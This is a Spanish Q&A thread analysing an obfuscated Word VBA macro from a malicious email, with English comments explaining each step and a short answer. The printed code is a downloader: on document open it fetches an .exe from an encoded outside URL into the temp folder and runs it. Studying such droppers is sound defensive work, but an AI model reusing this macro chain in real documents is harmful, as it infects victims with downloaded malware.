Deobfuscate office VBA code (malware) [cerrado]


Me han enviado un correo electrónico malicioso y estoy tratando de averiguar qué hace el código malicioso.

He logrado localizar la carga útil al descifrar los valores de Chr(), pero el resto del código sigue siendo irreconocible.

        'xsWChLNzlXVGlYZFbEhKDOzjNBrFZHSIl

        'DpcvleMuqWiFyl
        'hyaTdAKzoQinNr


        ' Win32 API imports under random names. The #If VBA7 branch adds PtrSafe for
        ' 64-bit-capable Office hosts; the #Else branch repeats the same set for older
        ' hosts. Every declaration uses the same five-parameter shape (Long, String,
        ' String, Long, Long), which is the shape of URLDownloadToFileA(pCaller, szURL,
        ' szFileName, dwReserved, lpfnCB) but not of the other aliased APIs -- those
        ' look like decoys, and none of them is called anywhere in the code shown here.
        ' The only import actually used is VQBzUNhAGAtJOoF (urlmon!URLDownloadToFileA),
        ' called from hbnTqBUKPuGRJiqWZCx below. VBA binds a Declare target on first
        ' call, so unused declarations are never resolved and need not even exist.
        ' NOTE(review): "Lib kernel32" / "Lib urlmon" appear without quotes, which is
        ' not valid VBA syntax; the listing has most likely lost its string quotes
        ' (the bare Chr(Asc(w)) calls further down show the same damage).
        #If VBA7 Then
        Private Declare PtrSafe Function GZwSeWZyIhNenjnZ Lib kernel32 Alias GetNumaNodeProcessorMask (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMke As String, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJLMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnejelVYixgTcfwsAmLJ As Long, ByVal elVYixgTcfwsAmLJoclNInPDShbETYbn As Long) As Long
        Private Declare PtrSafe Function elVYixgTcfwsAmLJ Lib kernel32 Alias WriteStateContainerValue (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare PtrSafe Function oclNInPDShbETYbn Lib kernel32 Alias CreateDirectoryExA (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare PtrSafe Function MoJTLPWYmfKTgbz Lib kernel32 Alias GetConsoleHistoryInfo (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal lzYSEXffcfoThUb As String, ByVal elVYixgTcfwsAmLJDBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZelVYixgTcfwsAmLJ As Long) As Long
        Private Declare PtrSafe Function MuRvBqzFOoCHiUHOJKw Lib kernel32 Alias GetTickCount64 (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare PtrSafe Function PAOKWMEkbYEoQQFQIb Lib kernel32 Alias FT_Exit24 (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare PtrSafe Function lIpXcxrTzTjpyvtA Lib kernel32 Alias GetProductName (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare PtrSafe Function JUNdgZxoTRSDKy Lib kernel32 Alias FindCloseChangeNotification (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnejelVYixgTcfwsAmLJ As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare PtrSafe Function VQBzUNhAGAtJOoF Lib urlmon Alias URLDownloadToFileA (ByVal LGXqVWHEnKiVcwaykFTVOtoYnoTDLwWaNw As Long, ByVal KftlkyaxsIGlyvxXaRq As String, ByVal tEMWFoNKZputSPQzVOtoYnoTDLwWaNw As String, ByVal VOtoYnoTDLwWaNwelVYixgTcfwsAmLJelVYixgTcfwsAmLJ As Long, ByVal elVYixgTcfwsAmLJelVYixgTcfwsAmLJVOtoYnoTDLwWaNw As Long) As Long
        Private Declare PtrSafe Function EQYZGelqKWNJRcce Lib kernel32 Alias PrivCopyFileExW (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbnelVYixgTcfwsAmLJ As Long) As Long
        Private Declare PtrSafe Function iwjgRBIGLZpUNGoGTG Lib kernel32 Alias OfferVirtualMemory (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMke As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnejelVYixgTcfwsAmLJ As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        #Else
        Private Declare Function MuRvBqzFOoCHiUHOJKw Lib kernel32 Alias GetTickCount64 (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare Function PAOKWMEkbYEoQQFQIb Lib kernel32 Alias FT_Exit24 (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare Function lIpXcxrTzTjpyvtA Lib kernel32 Alias GetProductName (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare Function JUNdgZxoTRSDKy Lib kernel32 Alias FindCloseChangeNotification (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnejelVYixgTcfwsAmLJ As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare Function EQYZGelqKWNJRcce Lib kernel32 Alias PrivCopyFileExW (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbnelVYixgTcfwsAmLJ As Long) As Long
        Private Declare Function iwjgRBIGLZpUNGoGTG Lib kernel32 Alias OfferVirtualMemory (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMke As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnejelVYixgTcfwsAmLJ As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare Function VQBzUNhAGAtJOoF Lib urlmon Alias URLDownloadToFileA (ByVal eaNkjdOHzsdMqQQJj As Long, ByVal elVYixgTcfwsAmLJelVYixgTcfwsAmLJ As String, ByVal hyaTdAKzoQinNr As String, ByVal oclNInPDShbETYbnelVYixgTcfwsAmLJ As Long, ByVal MoJTLPWYmfKTgbzoclNInPDShbETYbn As Long) As Long
        Private Declare Function GZwSeWZyIhNenjnZ Lib kernel32 Alias GetNumaNodeProcessorMask (ByVal lzYSEXffcfoThUb As Long, ByVal SqgFeQsbOnOMZMke As String, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJLMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnejelVYixgTcfwsAmLJ As Long, ByVal elVYixgTcfwsAmLJoclNInPDShbETYbn As Long) As Long
        Private Declare Function elVYixgTcfwsAmLJ Lib kernel32 Alias WriteStateContainerValue (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare Function oclNInPDShbETYbn Lib kernel32 Alias CreateDirectoryExA (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare Function MoJTLPWYmfKTgbz Lib kernel32 Alias GetConsoleHistoryInfo (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal lzYSEXffcfoThUb As String, ByVal elVYixgTcfwsAmLJDBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZelVYixgTcfwsAmLJ As Long) As Long
        #End If

        ' Filler routine: not called anywhere in the code shown, ignores its parameter
        ' and never assigns a return value. It copies one never-declared name into
        ' another and compares them (presumably Empty = Empty, so the If is always
        ' taken, but its body is only a comment). Identical to
        ' GZwSeWZyIhNenjnZtyfevPUzZSHNUpjY at the end of the module -- padding meant
        ' to bulk up the module and dilute signature matches.
        Function tyfevPUzZSHNUpjYGZwSeWZyIhNenjnZelVYixgTcfwsAmLJ(ByVal AEbtrIvLZRPbVNZDkwQiwTpwOOdeofW As Integer)
        kulqYfDfxsawQDJKsAEbtrIvLZRPbVN = tyfevPUzZSHNUpjY
        If kulqYfDfxsawQDJKsAEbtrIvLZRPbVN = tyfevPUzZSHNUpjY Then
        'GZwSeWZyIhNenjnZoclNInPDShbETYbn=MoJTLPWYmfKTgbz
        End If
        End Function
        ' Download wrapper. AEbtrIvLZRPbVNfgVj is the source URL and hUfrAbrdnkOdGp the
        ' local destination path; both are handed straight to VQBzUNhAGAtJOoF, i.e.
        ' urlmon!URLDownloadToFileA. The surrounding If block and the final assignment
        ' only shuffle never-declared names and have no effect on the download.
        ' No return value is assigned, and the HRESULT of URLDownloadToFileA is
        ' discarded, so the caller cannot tell whether the download succeeded.
        Function hbnTqBUKPuGRJiqWZCx(ByVal AEbtrIvLZRPbVNfgVj As String, ByVal hUfrAbrdnkOdGp As String)
        If PSUWksxjZPfDYLXwvxT = rMDsWrTugbpcOBHF Then
        PYcyaTaPAZYqaEfo = ZPrnJJzqaCCtqvTbUx
        'cbxeKGrLfUwXefANSyFxsWChLNzlXVGlYZZPrnJJzqaCCtqvTbUx
        ZPrnJJzqaCCtqvTbUx = PSUWksxjZPfDYLXwvxT
        End If
        ' The arithmetic is junk that evaluates to constants:
        '   4 - 2 - 2 + 0 + 0 = 0, -4 + 4 + 100 - 100 = 0, 0 + 2 - 2 = 0
        ' so this is URLDownloadToFileA(0, url, localPath, 0, 0): no caller object,
        ' no reserved flags, no progress callback.
        VQBzUNhAGAtJOoF 4 - 2 - 2 + 0 + 0, AEbtrIvLZRPbVNfgVj, hUfrAbrdnkOdGp, -4 + 4 + 100 - 100, 0 + 2 - 2
        kulqYfDfxsawQDJKs = tyfevPUzZSHNUpjY
        End Function


        'Dim GwBumCCwetkuJxFBCpItkYuBQhYPrTgw as Boolean
        ' Main stage of the downloader, invoked from Document_Open. It (1) rebuilds the
        ' download URL from Chr() values and reverses it, (2) rebuilds a file name the
        ' same way, (3) prefixes it with the user's temp directory, (4) downloads the
        ' URL to that path via hbnTqBUKPuGRJiqWZCx / URLDownloadToFileA, and (5)
        ' launches the downloaded file with Shell. Every If block and every assignment
        ' between never-declared names in between is filler with no effect.
        ' Detection angle: an auto-exec macro that reaches urlmon!URLDownloadToFileA
        ' and then Shell on a path under %TMP% is the classic macro-dropper chain.
        Private Sub VOtoYnoTDLwWaNw()
        iCQYbaBRKwhBnk = lhkiLXZpbeIyqeoYYT
        ' Step 1: the URL, built character by character and stored reversed; DBjnUFZaqAWuPymnej
        ' is StrReverse. The asker already decoded it. NOTE(review): Chr(Asc(w)) and
        ' Chr(Asc()) are not valid VBA as printed -- the string quotes around the
        ' single-character literals were evidently stripped when the listing was pasted.
        kblSRXpqDJMxcL = DBjnUFZaqAWuPymnej(Chr(101) + Chr(120) + Chr(101) + Chr(46) + Chr(Asc(w)) + Chr(Asc(l)) + Chr(98) + Chr(100) + Chr(111) + Chr(Asc(c)) + Chr(47) + Chr(116) + Chr(97) + Chr(99) + Chr(46) + Chr(102) + Chr(109) + Chr(Asc(o)) + Chr(Asc(p)) + Chr(46) + Chr(Asc(a)) + Chr(Asc()) + Chr(Asc()) + Chr(Asc()) + Chr(115) + Chr(Asc(p)) + Chr(116) + Chr(116) + Chr(104))

        If AEbtrIvLZRPbVN = ZDkwQiwTpwOOdeofW Then
        SqgFeQsbOnOMZMke = dhwvEFcKDpsYsyJeZg
        lzYSEXffcfoThUb = LMWHPWrDMfeVqPZuwgu
        End If

        ' Step 2: the local file name, again stored reversed (quotes stripped here too).
        ZKsXGJZRFGCfXvXP = DBjnUFZaqAWuPymnej(ctsalal)

        If vMtgBnwtQByVtExPHr = rSCIQrDtFvkdcUGB Then
        iTWgFywkvRqSPai = ZUqEtJtyPvyDIJuP
        End If

        ' Step 3: destination path. The arithmetic resolves to
        '   Chr(84) Chr(77) Chr(80) = "TMP"  and  Chr(92) = "\"
        ' so this is Environ$("TMP") & "\" & <file name>, i.e. a file in the user's
        ' temp directory. (The accepted answer writes it as "TEMP\"; the variable
        ' actually read is TMP, which normally points at the same folder.)
        VJtYenETeqAVMuxRbDY = Environ$(Chr(22# + 22# + 22# + 8# + 10#) + Chr(100 - 100 + 4 + 3 + 50 + 20) + Chr(2 - 2 + 100 - 10 - 5 - 5)) + Chr(2 + 10 + 20 + 30 + 30) & ZKsXGJZRFGCfXvXP

        If jAINgzIjHHlNyJLBCET = snhxHQABbdQMsDkgL Then
        lzYSEXffcfoThUb = LMWHPWrDMfeVqPZuwgu
        End If

        ' Step 4: download URL -> temp path (URLDownloadToFileA). The trailing comment
        ' is leftover filler, not a real condition.
        hbnTqBUKPuGRJiqWZCx kblSRXpqDJMxcL, VJtYenETeqAVMuxRbDY 'if jAINgzIjHHlNyJLBCET = snhxHQABbdQMsDkgL Then

        ' Unused local; exists only as padding.
        Dim rSCIQrDtFvkdcUGBVJtYenETeqAVMuxRbDY As Currency

        ' Step 5: execute whatever was written to the temp path, in a normal window.
        ' Nothing checks that the download succeeded or that the file exists first.
        Call Shell(VJtYenETeqAVMuxRbDY, vbNormalFocus) ' Dim rSCIQrDtFvkdcUGBVJtYenETeqAVMuxRbDY as Integer
        QVKciSoAuvfQxE = WIlNjMLmbBEiXU
        End Sub

        ' Auto-execution entry point: Word runs Document_Open as soon as the document is
        ' opened with macros enabled, so no user click is needed beyond enabling macros.
        ' It does nothing but hand off to the download-and-run routine above; the
        ' trailing comment is filler. This is the line a static scanner or YARA rule
        ' would pair with the URLDownloadToFileA / Shell pair to flag the document.
        Sub Document_Open()
        VOtoYnoTDLwWaNw 'kulqYfDfxsawQDJKstyfevPUzZSHNUpjY
        End Sub

        ' Filler routine: not called anywhere in the code shown, ignores its parameter
        ' and never assigns a return value. Both assignments copy one never-declared
        ' name into another; the Dim inside the If declares a local that is never used.
        Private Function EoUkpEUNnhmSKLKUmtAYNRreSwhjqjV(ByVal FbEhKDOzjNBrFZHSIlEoUkpEUNnhmSKL As String)
        TSSWLPSPMemjroWC = KUmtAYNRreSwhjqjV


        If KUmtAYNRreSwhjqjV = EoUkpEUNnhmSKL Then
        TSSWLPSPMemjroWC = KUmtAYNRreSwhjqjV

        Dim FbEhKDOzjNBrFZHSIl As Currency

        End If

        End Function

        ' Filler routine: not called anywhere in the code shown; a single assignment
        ' between two never-declared names, with no observable effect.
        Private Sub eIZAqeJRzrTIWdkoMI()
        oFxRFuVhRCqIsfBH = MRVXJWcClZWEiZqHHU
        End Sub

        ' The only real decoding primitive in the module: returns its argument reversed
        ' (StrReverse). Both the URL and the file name in VOtoYnoTDLwWaNw are stored
        ' backwards and pass through here. The two If blocks around the StrReverse are
        ' filler that only juggles never-declared names. Note the name collides with one
        ' of the parameter names used in the Declare lines above, which is harmless but
        ' makes grepping harder -- likely the point.
        Private Function DBjnUFZaqAWuPymnej(lJWzsWzeaVgVJGa)
        If TSSWLPSPMemjroWC = KUmtAYNRreSwhjqjV Then
        TSSWLPSPMemjroWC = KUmtAYNRreSwhjqjV
        End If
          DBjnUFZaqAWuPymnej = StrReverse(lJWzsWzeaVgVJGa)

        If TSSWLPSPMemjroWC = KUmtAYNRreSwhjqjV Then
        KUmtAYNRreSwhjqjV = EoUkpEUNnhmSKL
        End If
        End Function

        ' Filler routine, byte-for-byte the same body as
        ' tyfevPUzZSHNUpjYGZwSeWZyIhNenjnZelVYixgTcfwsAmLJ near the top of the module:
        ' not called anywhere in the code shown, ignores its parameter, assigns no
        ' return value, and its If body is only a comment.
        Function GZwSeWZyIhNenjnZtyfevPUzZSHNUpjY(ByVal AEbtrIvLZRPbVNZDkwQiwTpwOOdeofW As Integer)
        kulqYfDfxsawQDJKsAEbtrIvLZRPbVN = tyfevPUzZSHNUpjY
        If kulqYfDfxsawQDJKsAEbtrIvLZRPbVN = tyfevPUzZSHNUpjY Then
        'GZwSeWZyIhNenjnZoclNInPDShbETYbn=MoJTLPWYmfKTgbz
        End If
        End Function

¿Qué métodos puedo usar para descifrar o decodificar el código anterior y entender lo que hace?

He probado el script oledump.py que se encuentra aquí ( enlace ), pero fue en vano.

El código resaltado se puede ver aquí: enlace

    
pregunta user3580480 19.11.2016 - 09:44

1 respuesta


VQBzUNhAGAtJOoF es un alias para URLDownloadToFileA

Environ$(Chr(22# + 22# + 22# + 8# + 10#) + Chr(100 - 100 + 4 + 3 + 50 + 20) + Chr(2 - 2 + 100 - 10 - 5 - 5)) + Chr(2 + 10 + 20 + 30 + 30) es igual a "TEMP\"

Por lo general, estos scripts son todos iguales: descargan un ejecutable de Internet a la carpeta temporal del usuario y lo ejecutan (en este código, mediante la instrucción Shell).

Ese ejecutable es el código malicioso real.

    
respondido por el Jeff 19.11.2016 - 11:23
